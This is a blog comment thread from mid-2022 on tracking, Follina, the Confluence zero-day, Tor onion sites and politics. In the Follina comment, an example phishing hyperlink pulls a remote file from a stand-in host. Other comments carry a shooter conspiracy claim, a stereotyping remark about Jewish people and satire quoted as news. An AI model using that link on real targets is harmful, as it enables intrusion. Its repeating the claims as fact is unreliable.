https://www.accessnow.org/cms/assets/uploads/archive/AIBT-Report.pdf

Supercookies can restore the data of your deleted cookies and link the data with new ones. They can access your login credentials, image and file caches, and plug-in data. Ad blockers can’t block them, and you can’t clear them by deleting your browser history and cache data. You can’t simply delete supercookies.

ResearcherZero May 31, 2022 3:08 AM

“Roughly 17,000 Android apps collect identifying information that creates a permanent record of the activity on your device”
https://www.cnet.com/tech/mobile/these-android-apps-have-been-tracking-you-even-when-you-say-stop/

identifiers

To keep track of who is who, trackers need identifiers that are unique, persistent, and available. In other words, a tracker is looking for information (1) that points only to you or your device, (2) that won’t change, and (3) that it has easy access to.
https://www.eff.org/wp/behind-the-one-way-mirror#Part1

even devices with MAC randomization usually share static MAC addresses when they actually connect to a wireless hotspot or Bluetooth device
https://www.eff.org/wp/behind-the-one-way-mirror#Part2

“With enough beacons in enough places, companies can track users’ movement around stores or around a city. They can also identify when two people are in the same location and use that information to build a social graph.”
https://conferences.sigcomm.org/imc/2013/papers/imc148-barberaSP106.pdf

“Don’t bridge Advertising ID resets.”
https://developer.android.com/training/articles/user-data-ids

“…if reset, a new advertising identifier must not be connected to a previous advertising identifier or data derived from a previous advertising identifier without the explicit consent of the user.”

Your app must be a device or profile owner app, have special carrier permissions, or have the READ_PRIVILEGED_PHONE_STATE privileged permission in order to access these identifiers.

fraud prevention services also use hardware identifiers, SSAID, MAC address, IMEI, etc.,

ResearcherZero May 31, 2022 3:23 AM

@Ted

I’d like to know what options are available

You could use one of those magic covers that block microwave and wireless emissions. Obviously the phone will not work while inside one of these housings.

Key Identifiers for Mobile Devices
https://citizenlab.ca/2015/05/the-many-identifiers-in-our-pocket-a-primer-on-mobile-privacy-and-security/

https://citizenlab.ca/wp-content/uploads/2015/05/The-Many-Identifiers-in-Our-Pockets-A-primer-on-mobile-privacy-and-security-_reportPDF.pdf

“From a privacy perspective Microsoft Edge and Yandex are qualitatively different from the other browsers studied. Both send persistent identifiers than can be used to link requests (and associated IP address/location) to back-end servers.”
https://www.scss.tcd.ie/Doug.Leith/pubs/browser_privacy.pdf

ResearcherZero May 31, 2022 4:21 AM

Follina (CVE-2022-30190)

Two days ago, Nao_sec identified an odd looking Word document in the wild, uploaded from an IP address in Belarus:

The document uses the Word remote template feature to retrieve a HTML file from a remote webserver, which in turn uses the ms-msdt MSProtocol URI scheme to load some code and execute some PowerShell.

That should not be possible.

the first problem is Microsoft Word is executing the code via msdt (a support tool) even if macros are disabled. Protected View does kick in, although if you change the document to RTF form, it runs without even opening the document (via the preview tab in Explorer) let alone Protected View.

I’m calling it Follina because the spotted sample on the file references 0438, which is the area code of Follina in Italy.

As an example, you can send an email with this text as a hyperlink:

ms-excel:ofv|u|https://blah.com/poc.xls

And Outlook will gladly let the user click the hyperlink and open the Excel document. You can even change the text to be something friendly, like “Invoice”. Because the document isn’t attached to the email, and the URI doesn’t start with http or https, most email gateways are going to let that sucker straight through as nothing appears malicious.
https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e

Microsoft has now revealed the CVE identifier for this vulnerability is CVE-2022-30190

If utilizing Microsoft Defender’s Attack Surface Reduction (ASR) rules in your environment, activating the rule “Block all Office applications from creating child processes” in Block mode will prevent this from being exploited. However, if you’re not yet using ASR you may wish to run the rule in Audit mode first and monitor the outcome to ensure there’s no adverse impact on end users.

Another option is to remove the file type association for ms-msdt (can be done in Windows Registry HKCR:\ms-msdt or with Kelvin Tegelaar’s PowerShell snippet). When the malicious document is opened, Office will not be able to invoke ms-msdt thus preventing the malware from running. Be sure to make a backup of the registry settings before using this mitigation.
https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug

ResearcherZero May 31, 2022 4:32 AM

@Ted

To be precise, what you want is a Faraday Bag:

“intertwined copper and plastic layers insures the same signal-blocking effects”

“In a nutshell, Faraday bags grant you the benefit of having the protection that NATO operatives have, but in a light and portable form factor.”

“The fact that you can take this security with you anywhere without raising suspicions is yet another advantage.”

“People around you will think that you’re carrying a cheap nylon wallet or some sort of common bag.”
https://privacypros.io/faraday-bags/

Most of those EMF protective covers are crap and don’t work.

Winter May 31, 2022 4:33 AM

@All
How Firefox tries to limit/block supercookies

ht-tps://blog.mozilla.org/security/2021/01/26/supercookie-protections/

Ted May 31, 2022 6:51 AM

@ResearcherZero

To be precise, what you want is a Faraday Bag:

I don’t know if I would count on any technology to help me “safely” break the law. But it’s an interesting thought.

I’d probably feel better taking a legal and/or political approach. But it wouldn’t surprise me if a few technology companies get their fingers slammed in the door on this issue.

GrandInquisitor May 31, 2022 8:56 AM

That was not advertising. I am referencing the platform where the squidcontent is from.

I thought they stopped operating due to petty infighting long ago.

Isengrim Bolger-Baggins May 31, 2022 8:58 PM

== Guardian launches Tor onion service

“The Guardian website is now available to Tor users as an “onion service”, at the address:

https://www.guardian2zotagl6tmjucg3lrhxdk4dw3lhbqnkvvkywawy3oqfoprid.onion

The Tor network helps conceal its users’ locations, which makes tracking their internet activity much more difficult. Tor also makes it harder for internet service providers to identify what their users are accessing. This means users can bypass censorship in parts of the world where access to independent news might be difficult or if certain websites and services are banned.

Guardian readers have always been able to access https://www.theguardian.com using tools such as Tor Browser. These browsers route their communications over the Tor network – thereby concealing the reader’s location. But the browsers’ communications have to exit the Tor network for the final leg of the journey in order to get to the site on the normal world wide web.

The introduction of a Guardian onion service means that the entire communication pathway between a reader and the Guardian takes place within the Tor network, thereby avoiding potential risks with the “hop” between the Tor network and the world wide web service. An example of such a risk could be that the “exit node” – the gateway between the normal web and the Tor network – could contain malicious software or be located somewhere that is subject to censorship.”

Article: https://www.theguardian.com/help/insideguardian/2022/may/30/guardian-launches-tor-onion-service

== Two other large news sites of note also have .onion addresses:

BBC: https://www.bbcnewsd73hkzno2ini43t4gblxvycyac5aw4gnv7t2rccijh7745uqd.onion/
NYTimes: https://www.nytimesn7cgmftshazwhfgzm37qxb44r64ytbb2dj3x62d2lljsciiyd.onion/

JonKnowsNothing May 31, 2022 11:34 PM

@All

re: Leaking the SCOTUS wrecking documents

MSM reports that in pursuit of the Leaker of the soon-to-be published SCOTUS ruling on the health and well being of 50% of the US population inhabiting 50% of the landmass of the USA, the US Supreme Court Clerks “may be required” to hand over their phone records.

An interesting development..

1) IF they have warrant they do not need the permission of the clerks to get their phone records and anything else that happens electronically, just as the same information is open season on everyone in the USA.

2) IF there was indication of something globally, most LEAs don’t even need a warrant for that.

3) Presumption of Guilty by Dunking. If you have nothing to hide….

4) Some clerks are beginning to question the part of their job ensuring “equal justice under the law” and realize it’s time to get a lawyer.

5) There are other suspects in the usual roundup of Colonel Mustard in the Copy Room with the Staple Remover: the nine supreme court justices, certain staffers and other administrative officers within the court.

RL anecdote, tl;dr

While in a discussion of reliability and honesty with a high placed Banking Executive, they relayed the following War Story.

A shortage was found in the bank tellers money counts. It was intermittent but clearly someone was fiddling the numbers. The question was which of bank tellers was it.

A bank investigator was brought in and the Bank Executive sat in on the interviews while each bank teller was questioned about the shortages.

After all the interviews were completed, the investigator asked the Bank Executive which person did he think was responsible. The Bank Executive defended all the tellers especially one that had been with the company the longest and had the highest reputation.

The investigator asked for that person to return for another interview. It wasn’t long before the person admitted they had taken the funds.

The Bank Executive was dumbfounded.

  “I trusted you!”

“Exactly so”, said the investigator.

===

Search Terms

US Supreme Court Clerks

Hand over phone records

SpaceLifeForm June 1, 2022 1:51 AM

@ JonKnowsNothing

re: Leaking the SCOTUS wrecking documents

Much Ado About Nothing

As I can not identify any crime that was committed, that would explain why there is an ask for the phone records. Otherwise, a warrant would be in play.

I am not familiar with any copying machines that require a cell phone in order to use. I am not saying they do not exist.

Overall, it does appear to be an interesting Witches Cauldron Brew.

Colonel Eye of Newt apparently has some recipe in mind.

ResearcherZero June 1, 2022 2:48 AM

@Ted

Politicians might find a Faraday Bag handy. In Australia at least, if you are ever giving evidence in a corruption inquiry, they will quite happily put a hit on you. So it could be handy when they are meeting with corrupt cops, bribing prosecutors, or perhaps a judge or two. Though I already have all the evidence (certified and replicated in a dead-drop), so they are rather f**cked in that regard.

And it just so happens…

Australia to get new federal anti-corruption body after previous government loses election and gets the boot.

“It will be a national anti-corruption commission with teeth, which will have independent investigative powers and which will be real in opposition to the model that has been rejected by all.”

The issue becomes even more relevant following new research published by the Centre for Public Integrity’s group of independent experts questioning the $55 billion spent by the Morrison government on grants over the past four years.

The investigation found that there was little or no oversight in how the money was spent.

“since 2012, corruption in Australia – if we read the reports and data from international organisations and universities – is increasing.”
https://www.sbs.com.au/language/english/our-democracy-is-disintegrating-federal-icac-top-of-list-for-senate-candidate-yolanda-vega

The Old Model

“unlike a royal commission, the CIC would lack the power to hold public hearings”

Referrals in the public division can only be made by certain individuals including the Attorney-General, the responsible minister for the agency investigated, Commonwealth Integrity Office Holders and certain parliamentarians.

Investigations in the law enforcement division can be referred by anyone — including members of the public.

The powers to hold public hearings and publish findings also differ significantly between the two divisions.

Hearings relating to the law enforcement division would be held in public. In contrast, hearings relating to the public sector division, including politicians and their staffers, “must be held in private”, the government’s bill says.
https://www.ag.gov.au/system/files/2020-11/cic-bill-exposure-draft.pdf

Comparing the CIC with royal commissions appears to have first been raised by then attorney-general Christian Porter in November 2020.

Mr Porter said the CIC would have “greater investigatory powers than a Royal Commission”.
https://webarchive.nla.gov.au/awa/20210325234831/https://www.attorneygeneral.gov.au/media/media-releases/release-commonwealth-integrity-commission-consultation-draft-2-november-2020

The Corruption Commission Act was dropped despite government promises in recent years to introduce one.
However, while the powers were intended to be extremely limited, the facade of appearing transparent has now been dropped.

“If text messages calling the Prime Minister a liar, a psychopath and a horrible person could be broadcast publicly so easily, it would be a nightmare for our federal politicians to have an actual body dedicated to exposing corruption,” Cash said.

“That’s why we’d much rather break campaign promises than have politicians come out on blatant corruption, as you can imagine.”

“Imagine if that stuff got to the media.”
https://apdaweb.org/federal-government-scraps-icac-law-after-seeing-how-easy-it-is-for-people-to-get-their-text-messages-the-betoota-advocate/

Angelos June 1, 2022 6:10 AM

Bruce Schneier and 25 other leading computer scientists and academics have signed a letter to US lawmakers, urging them to crack down on the cryptocurrencies industry.

The letter can be read here:
https://concerned.tech/

Mentions on Stephen Diehl’s Twitter account:
https://twitter.com/smdiehl/status/1531920898944602114?s=20&t=y97oTuAVJ8jonUkIg1u23w

A snip from the letter:
By its very design, blockchain technology, specifically so-called “public blockchains”, are poorly suited for just about every purpose currently touted as a present or potential source of public benefit. From its inception, this technology has been a solution in search of a problem and has now latched onto concepts such as financial inclusion and data transparency to justify its existence…

ResearcherZero June 1, 2022 6:41 AM

“It sounds like the stuff of science fiction: Two closely related species hybridize and create a superorganism whose growth and expansion seems unstoppable. That’s what’s happened in Western Australia’s Shark Bay, researchers say, where a seagrass meadow (see above) stemming from a single hybrid plant has extended its reach across more than 180 kilometers—an area the size of Washington, D.C.”
https://www.science.org/content/article/world-s-largest-organism-found-australia

There be squid in them waters…

Clive Robinson June 1, 2022 6:46 AM

@ SpaceLifeForm, ALL,

Re “We did verify she closed the door,”

And

… a push bar exit door can be enabled to not lock.

May well not be not the issue.

Normally doors witb “push bar” exit have “auto-closers”, because they are “emergancy doors”. Mostly where adults and teenagers are they will be strong enough for them to close the door fully if well maintained.

However where under teens are involved such auto-closers are insufficient to close a door fully unless it can build up sufficient inertia in the door. That is the door closers are set at a way lower force for two reasons,

1, So children can push them open in emergancies.
2, So that the close preasure will not bruise, break, or amputate childrens fingers by normal accidental closure (another letting the door go).

Now consider you are in a building and you hear shots being fired as military training will tell you slightly counter intuitively you are actually better off “outside the building in cover as you do not get pinned down” or as was once put to me “cornered like a rat in a trap”

Or as my father who was soldier in WWII once rather memorably told me,

“The place to be when there is trouble, is somewhere else.”

He also explained how basic situational awareness helps you spot when things are “brewing up” and it’s time to get out of the heat and be cool about it.

Some people have a “sixth sense” thus are naturally situational aware. Most teachers of children and parents find when their children are infants and above they develop a sixth sense they did not have before at a subconcious level.

We get told about the “Fight or Flight” response and it makes it sound like a binary option to an immediate threat. It’s actually not true some animals have a faint response to being startled, this is not just some breeds of goat, but posums and smaller rodents like mice. As well as several others where their primary preditors “respond to movment” as they only go for “live prey” so appearing dead to a high degree is actually a counter intuative survival response.

So some humans have learnt by luck, intuition or training to use another counter intuative tactic which is to not hide, but move slowly away before the attacker pounce response is activated. This “avoidence” response will cause some people to cross open space to gain distance and seek cover by which their further avoidence responce will be covered so they do not get attacked.

So consider, you have heard both the vehical crash and the initial shots at people up the street. That is enough to make the more astute drop into “avoidence response”.

So you leave carefully and quietly and without sudden movment.

Thus you would open the door slowly exit low and hold it as it closed so it would not make much movment and no noise to attract attention.

Yes you have “closed the door” but there is insufficient force on the door for the push-bar to re-lock unless you actually push it. If you have closed the door quietly, you are unlikely to give it a shove as that would create noise. Also if you are halfway smart, you would realise you might have to retreat back through it…

I’m not saying this happened, because I don’t think you should go from effect “door left open” to cause “woman left it open” as that is against the scientific method.

All I’m saying is that as an “individual with agency” who has also been situationaly aware from an early age[1], and later honed by training at various levels, yes I’d leave as fast as safely possible without compromising myself, I would then get “backup” and give situational information. And yes I’d probably close the door but not lock it as logically it’s the most sensible thing to do.

The reason it went wrong from what has been said is that the “backup” was not at all well trained, or had no tactical experience, so followed a plan made by a committee that cared more for defending actions in court at some future date than actually providing the sort of response required…

I think we can expect “what-aboutism” to be brought into play to say that the police behaved properly and everyone else did not, so the thin blue-line “responsible behaviour” “protect and serve” and other faux “motherhood and apple pie” image and similar nonsense can be pushed. So don’t be surprised if a bunch of commendations get handed out down the line…

[1] Try being a foot taller than many adults when you are just becoming 11 years old, you get bullied a lot not just by other children but adults as well. Just being tall even when “small” gets you bullied, especially if you are always “curious” it makes you noticed thus a target. It’s loose-loose because if you fight and put them down because you are bigger you are in the wrong, if you back down this just encorages further bullying. Thus developing good avoidence skills keeps you healthy.

[2] One other basic lesson you get taught during military training is that the way to deal with an inferior group is to hit them hard and fast as this limits their time ability to harm you, a gun fires only one bullet at a time after all, and you tend not to be that accurate in hitting targets when comming under heavy fire. I suspect the Boarder Patrol people not only knew that from training but excercises and possibly actual experience.

JonKnowsNothing June 1, 2022 7:33 AM

@SpaceLifeForm, @All

re: I am not familiar with any copying machines that require a cell phone in order to use.

People carry their cell phones everywhere, even to the loo, and within arms reach while taking a shower.

Getting Google et al to hand over a geofence warrant with detailed tracking might need a warrant.

Getting the CDRs is a popular fill-in-the-puzzle-piece for “who talked to whom” in the media and if there was a meet up or a dead drop or live drop of the document. That should also take a warrant if getting the CDRs direct from the provider. SCOTUS would need to know all the different providers, although they likely have all the phone numbers for all their employees and interns.

Getting the history search listing. Another popular item on the LEA list to find out who was looking up the How To Drop Off Anonymous Documents, and of side interest, if they were checking out several different drop off options and burner phones.

IANAL but I don’t think a “crime has to be committed” to get a warrant or subpoena, only that there is a “possibility of a crime” to get one. After they get the results then they can determine if there is enough data to proceed with prosecution for which a set of crimes are detailed.

I don’t know under which criminal codes pre-publishing the SCOTUS ruling would fall under but I’d guess at the least it’s like taking IP from any company and putting it out for public viewing (theft). In Tech cases, often this is done for PR extra publicity (we got a secret to tell). Might it be the same for SCOTUS?

If they had any doubts about the impact of their proposed alteration, they may have leaked it deliberately to find out how much of an uproar it was going to be?

I’d hazard a guess that’s the motivation for the leak: testing the temperature of the water in the boil pot. (1)

===

Search Terms

Seafood Boil

JonKnowsNothing June 1, 2022 8:13 AM

@ResearcherZero

re: seagrass meadow stemming from a single hybrid plant

The original mono-culture.

It’s a bit humbling that a plant like this can survive millennia while the rest of the planet, including us, has undergone many alterations and extinctions because we are just not suited to a particular environment.

Yet for every still living plant or creature, our genetics trace back to the same primordial ooze. It’s a long way to Tipperary…

Leon Theremin June 1, 2022 11:50 AM

Comment on the recent shootings in the US:

There is no anonymity if you connect to 4chan using a Silicon Valley designed processor.

The “facts” that these shooters are fed are highly tailored to what they are predisposed to believe already, because the ones posting have complete surveillance of everyone (including of you who reads this – you can thank Eric Schmidt) and know exactly what to post to create a shooter.

Silicon Valley has blood on their hands. 4chan is just one of the places used for these operations. Taking it down doesn’t matter, because as long as Silicon Valley continues to spy on everybody and give the data to terrorists, innocent people will continue to be murdered.

JonKnowsNothing June 1, 2022 1:02 PM

@All

re: A Musky Ultimatum: Pretend to Work

While M. Musk still cannot dredge up the cash to conclude his Twitter buyout, he has resorted to other shenanigans to avoid paying up the $1BILL deal default fee.

He has decided to irritate everyone one that works for him by claiming that His Sleep Over In The Office shows what a Great Leader He Is. He neglects to include that he no longer owns a place to sleep and has joined millions of workers couch surfing because they can’t afford the rent (1)

“Remote work is no longer acceptble [sic].”

“They should pretend to work somewhere else.”

“If you don’t show up, we will assume you have resigned.”

California is an At Will State:

  • You can be fired at any time and there doesn’t have to be a reason.
  • You are also free to quit work at any time, you don’t need to give notice.

However there are certain labor laws that get in the mix depending on whether you voluntarily left the job and under some circumstances the employer must give notice of staffing changes.

  • Unemployment Benefits
  • Health Care continuation (COBRA)
  • Vested v Unvested benefits, stock options, stock purchases, 401K

It’s possible the message would qualify for Employers Notice of Major Staffing Changes for the 100,000 employees who work at his factories.

For those that do head back to the office, it seems M.Musk is OK with “pretending to work” while spending 40 hours in a company provided cubicle.

Variations on Pretense:

  • Companies that have been insisting on their workforce returning to a fixed point, often have very long term leases and/or property investments in physical plant.
  • Companies that have remained flexible realize, they can off-site their office leasing to someone’s apartment and pocket the cost of office space, particularly in high rent locations.
  • There are also the companies that have demanded a kickback premium from their employees if they continue to work off-site: a 20% reduction in salary for letting the company use your electrical connection.

===

Search Terms:

Musk to Tesla and SpaceX workers

Be in the office 40 hours a week or quit

return to office or ‘pretend to work’ elsewhere

1) afaik, M.Musk still maintains he no longer owns a “place with personal sleeping quarters” and was couch surfing. Perhaps his ownership of SpaceX and Tesla contain equivalent rooms. Some companies do offer nap rooms and couches for employees.

RL tl;dr In the past, it was a sleeping bag under a desk. The janitors just vacuumed around your exhausted body.

SpaceLifeForm June 1, 2022 6:25 PM

Clutching Pearls

At least there was a hospital close by!

hxtps://www.nbcnews.com/news/us-news/multiple-victims-shooting-tulsa-hospital-gunman-police-say-rcna31551

Marjorie June 1, 2022 8:24 PM

@vas pup
Touring laser air defense system under development
and
Ofek spy satellites, 2 classified defense projects win top security prize

Clearly the Jewish people are very skilled with both space satellites and lasers

fib June 2, 2022 12:38 PM

@Angelos

Bruce Schneier and 25 other leading computer scientists and academics have signed a letter to US lawmakers, urging them to crack down on the cryptocurrencies industry.

Now I`m waiting for the next letter urging the Powers That Be to do something about the social media emergency[1].They are destroying our way of life before our complacent, bovine eyes.

I can dream, can’t I?

[1] Freedom of expression is originally about what you can say with your mouth using the strength of your lungs. Giving powerful communication tools for the ordinary Joe is nowadays almost tantamount to give everyone a nuke in a briefcase.

JonKnowsNothing June 2, 2022 5:03 PM

@Leon Theremin, @fib

re: Nothing changes until people riot.

And nothing changes much after that either.

I’m not sure anyone knows what makes things “change”. Things do change of course, but often the scale gets tipped further over.

A hum-int story about a Welsh language song that is now sung in popular events said the chorus means “We are Still Here”. That’s about the best one can hope for.

The good news is, there are a lot of people “Still Here”, even after 1,600 years of persecution.

===

Search Terms

Yma o Hyd (“Still Here”)

Dafydd Iwan Welsh-language folk singer

Clive Robinson June 2, 2022 5:08 PM

@ Moderator,

Just tried posting a reply to @Leon Theremin and @fib.

I recieved the 429 response, and on trying to post a second time got a ‘held for moderation’.

Has there been any progress on this overly obvious bug in the blog software behaviour?

lurker June 2, 2022 5:32 PM

@Clive, All

The HTTP 429 Too Many Requests response status code indicates the user has sent too many requests in a given amount of time (“rate limiting”).

there are Too Many Places along the route between client and server where things could happen to invoke this response. On a fast network where the client demands .img and .js in separate GETs too close. Or on a slow network where somebody isn’t waiting for ACKs. Then who knows what sillines modern routers can do in those circumstances.

The “held for moderation” I find has two principal causes: a naughty word or phrase must be spelled or insinuated differently; or it sometimes means correspondence on this subject is closed.

lurker June 2, 2022 5:40 PM

@JonKnowsNothing, 1600 years?

Depending on whose calendar, and whose script, I find a little over 6000 years.

And yes, there is a line that says it’s before they walked upright.

&ers June 2, 2022 7:08 PM

@ALL

Look who is lying and selling us all out.

hxxps://www.bleepingcomputer.com/news/security/duckduckgo-browser-allows-microsoft-trackers-due-to-search-agreement/

Maybe our host now decides to remove that “Powered by DuckDuckGo”
from this blog?

lurker June 2, 2022 7:49 PM

@&ers

My reading of the linked article is that the MS trackers only get through the iOS and Android DDG browser. It seems that DDG search on any other browser/OS combo does not yet have this problem. But as explained, the trackers are constantly morphing to get their victims . . .

&ers June 2, 2022 8:20 PM

@lurker

Today browser, tomorrow the whole search engine.
Cat is already out of the bag.
How can anyone trust them after all this?

&ers June 2, 2022 9:12 PM

@ALL

I hardly believe Microsoft pays them peanuts.
So DuckDuckGo has already taste of the money
in their mouth and it tastes good, considering
how they hided that so far.
So expect more to come.
They are already rotten.

ResearcherZero June 2, 2022 9:39 PM

@JonKnowsNothing

Elon was bullied at school. He’s just giving back. Maybe some of those school yard bullies were little girls, and perhaps he never got over it.

The IMF picks on the developing world in much the same manner, according to this obviously biased communist propaganda.

‘ Structural adjustment is the term used by the IMF to describe the loan conditions it imposes on indebted countries. These conditions include not only trade liberalization, but also deregulation of industry and privatization of state-owned industries and services. Such conditions prevent governments from managing basic services such as health, education or water. Dr Khor argues that governments should be able to manage these basic services if they so choose. They should also be able to control key aspects of their own trade policy. Governments must be entitled to protect the livelihoods of small producers and manufacturers by placing tariffs on unfairly subsidized imports – many of which come from Europe or America. Failure to do so generates poverty and joblessness, and further exacerbates the “de-industrialization” already underway in much of the developing world. ‘
https://www.globalissues.org/print/video/727

ResearcherZero June 2, 2022 9:43 PM

Under blue moon I saw you
So soon you’ll take me
Up in your arms, too late to beg you
Or cancel it though I know it must be
The killing time
Unwillingly mine
https://www.youtube.com/watch?v=LWz0JC7afNQ

different countries and how many resources their people—and their lifestyles—used in 2012

Kuwait comes top with 8.9 global hectares (5.1 Earths), followed by Australia (4.8 Earths), the United Arab Emirates (4.7 Earths) and Qatar (4.0 Earths). The others in the top 10 are Canada, Sweden, Bahrain, Trinidad and Tobago, and Singapore. The UK is 32nd on the list (2.4 Earths).
https://persquaremile.com/2012/08/08/if-the-worlds-population-lived-like/

The world needs to halve emissions in the next decade…
Gas emissions have to peak within the next four years to prevent a climate breakdown

Leaked IPCC Report
https://drive.google.com/drive/folders/1L_IXyVOeKetQbGXxTopQwhKrTIFr-usc

“The consequences of our recklessness are already apparent in human suffering, towering economic losses and the accelerating erosion of life on Earth”.

However there is a plan to fix it all, that should have been implemented 30 years ago, but better late than never.
https://wedocs.unep.org/xmlui/bitstream/handle/20.500.11822/34948/MPN.pdf

Coal

electricity generated from coal rose by 9 percent in 2021 to a record high, more than rebounding from a 4 percent fall in 2020

The increase is driven by China, India, the U.S. and the E.U. In China, whose power generation accounts for a third of global coal consumption, coal-fired power generation is forecast to grow by 9%. In India, it is expected to grow by 12% in 2021. This takes coal-fired electricity generation to all time-highs in both countries, according to the IEA.

In the U.S. and the E.U., coal power generation is set to increase by almost 20%

The IEA report also forecasts that overall global coal demand, including for uses outside of generating electricity, like making cement and steel, will grow by 6% this year and could hit new records in 2022.
https://iea.blob.core.windows.net/assets/f1d724d4-a753-4336-9f6e-64679fa23bbf/Coal2021.pdf

Despite being labelled as ‘clean energy’, none of the emissions HESC has produced in its pilot phase have been buried through Carbon Capture and Storage.

The Hydrogen Energy Supply Chain (HESC) Project uses brown coal gasification, the most polluting method possible, to make hydrogen.

Contrary to claims that HESC will reduce emissions by 1.8 million tonnes (Mt) per year when at full production, the project will instead likely increase emissions by up to 3.8 Mt per year.
https://australiainstitute.org.au/wp-content/uploads/2022/05/P1241-Bown-Coal-Greenwash-web.pdf

Methane

The growth of methane emissions slowed around the turn of the millennium, but began a rapid and mysterious uptick around 2007. The spike has caused many researchers to worry that global warming is creating a feedback mechanism that will cause ever more methane to be released, making it even harder to rein in rising temperatures.
https://www.nature.com/articles/d41586-022-00312-2

Methane concentrations in the atmosphere raced past 1,900 parts per billion last year, nearly triple preindustrial levels,
https://www.globalmethanepledge.org/#pledges

Water

Worldwide, agriculture accounts for 70% of all water consumption, compared to 20% for industry and 10% for domestic use. In industrialized nations, however, industries consume more than half of the water available for human use. Belgium, for example, uses 80% of the water available for industry.

Almost 80% of diseases in so called “developing” countries are associated with water, causing some three million early deaths. For example, 5,000 children die every day from diarrhoea, or one every 17 seconds.

Demand for freshwater is increasing by 64 billion cubic meters a year (1 cubic meter = 1,000 liters)

3,996,757,700,000 cubic meters
https://www.worldometers.info/water/

See the water footprint of a country and of each citizen. Compare it to others. Find out how much of that footprint lies within a country (internal) and how much is related to water used for imported products or ingredients (external).
https://www.waterfootprintassessmenttool.org/national-explorer/

If Earth’s history is compared to a calendar year, modern human life has existed for 37 minutes and we have used one third of Earth’s natural resources in the last 0.2 seconds.

ResearcherZero June 2, 2022 10:01 PM

“An initial review of one of the Confluence Server systems quickly identified that a JSP file had been written into a publicly accessible web directory. The file was a well-known copy of the JSP variant of the China Chopper webshell. However, a review of the web logs showed that the file had barely been accessed. The webshell appears to have been written as a means of secondary access.”

“In parallel, Volexity also processed the acquired memory samples with Volexity Volcano Server. This led to identification of bash shells being launched by the Confluence web application process. This stood out because it had spawned a bash process which spawned a Python process that in turn spawned a bash shell.

Subsequent root cause analysis of the compromise showed that the attacker had used a zero-day exploit, now assigned CVE-2022-26134, that allowed unauthenticated remote code execution on the servers.”

…When Atlassian provides a fix for this vulnerability, users should immediately patch, as this vulnerability is dangerous and trivially exploited.
https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/

CVE-2022-26134 – Critical severity unauthenticated remote code execution vulnerability

Confluence Server 7.18.0 and Confluence Server and Data Center 7.4.0 and higher are also potentially vulnerable.

Options to consider include:

Restricting Confluence Server and Data Center instances from the internet.

Disabling Confluence Server and Data Center instances.

This advisory will be updated as fixes become available.
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

A41APT case – Analysis of the Stealth APT Campaign Threatening Japan
https://teamt5.org/en/posts/japan-security-analyst-conference-2021/

Luoyu actively monitor their targets network traffic for app update requests linked to popular Asian apps such as QQ, WeChat, and WangWang and replace them with WinDealer installers.

WinDealer helps the attackers search for and siphon large amounts of data from compromised Windows systems, install backdoors to maintain persistence, manipulate files, scan for other devices on the network, and run arbitrary commands.
https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf

“Man-on-the-side-attacks are extremely destructive, as the only condition needed to attack a device is for it to be connected to the internet. Even if the attack fails the first time, attackers can repeat the process over and over again until they succeed,” – Suguru Ishimaru

Winter June 3, 2022 2:23 AM

@ResearcherZero

The IMF picks on the developing world in much the same manner, according to this obviously biased communist propaganda.

It has been said that IMF&Worldbank have never pulled a country out of poverty.

Some old and recent criticism:

ht-tps://www.theguardian.com/commentisfree/2019/aug/27/imf-economics-inequality-trump-ecuador

ht-tps://newint.org/features/1988/11/05/moonlight/

SpaceLifeForm June 3, 2022 2:39 AM

@ lurker, Clive, ALL

re: 429

It can happen even if you have not been here in a day.

If you get a 429, wait at least one minute before retry. That usually works.

I am not excusing this problem in any way, just noting a work-around that seems to work consistently.

lurker June 3, 2022 4:25 PM

@SpaceLifeForm, Clive

Wait a while and try again is the best defence for a 429. Most of the time it’s Not Your Fault. @Clive had reason to be peeved when his 429 was followed by a Held For Moderation, but I don’t think he was right to blame buggy blogware.

fwiw I’ve never had a 429 from here, which I put down to my long dirty path.

Leave a comment

Login

Allowed HTML <a href="URL"> • <em> <cite> <i> • <strong> <b> • <sub> <sup> • <ul> <ol> <li> • <blockquote> <pre> Markdown Extra syntax via https://michelf.ca/projects/php-markdown/extra/

Sidebar photo of Bruce Schneier by Joe MacInnis.